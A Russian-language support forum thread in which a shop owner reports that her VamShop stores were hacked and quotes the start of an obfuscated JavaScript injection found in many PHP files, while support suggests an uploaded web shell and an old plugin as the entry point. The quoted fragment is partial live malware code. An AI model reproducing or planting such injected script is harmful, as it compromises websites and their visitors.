-Inna- 0 Опубликовано 15 сентября, 2013 Жалоба Share Опубликовано 15 сентября, 2013 смотрю все сразу магазины разных версий на хостинге взломаны. пока только начали смотреть файлы. вижу запись вируса в ajax_shopping_cart.php login.php index.php начинаеться эта зараза так .причем вставлено в каждый указанный файл одно и тоже if(empty($dpk)) { $dpk = " <script type=\"text/javascript\" language=\"javascript\"> xjhpyx=\"spl\"+\"i\"+\"t\";tzacfx=window;telqul=\"0\"+\"x\";xfwom=(5-3-1);try{--(document[\"body\"])}catch(xdvs){dqkxv=false;try{}catch(njwvrb){dqkxv=21;}if(1){pqkpop= это что то новое похоже зы. дальше больше во всех файлах всех шаблонов !!! сидит этот код. в одном магазине нашелся вообще левый файл в корне qh.php с вирусной джавой (причем даже в нерабочих файлах ,оставленных просто для примера) причем сами сайты не открываються вообще - дает ошибку фатальная ошибка смарти =========== И что характерно - один магазин на движке симпла - там нет этого вируса. Первые мысли - ломали не вручную. пихать код во все файлы это только на автомате возможно. Новая дыра в движке или ? Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 15 сентября, 2013 Жалоба Share Опубликовано 15 сентября, 2013 Да всё тоже самое, по идее. А какие версии VamShop установлены?! Папка /admin/includes/javascript/tiny_mce/plugins/tinybrowser/ есть? Ссылка на сообщение Поделиться на другие сайты
-Inna- 0 Опубликовано 16 сентября, 2013 Автор Жалоба Share Опубликовано 16 сентября, 2013 версии от 1.55 до 171. по логам по фтп постороннего входа не было. из нового - в папке имагес нашелся текстовый файл тхт с вирусом ) Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 16 сентября, 2013 Жалоба Share Опубликовано 16 сентября, 2013 Да обычно ведь ftp и не пользуются, а заливают shell и через него гадят. Если все магазины на одном аккаунте, то через старую версию могли пролезть и во все остальные. Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения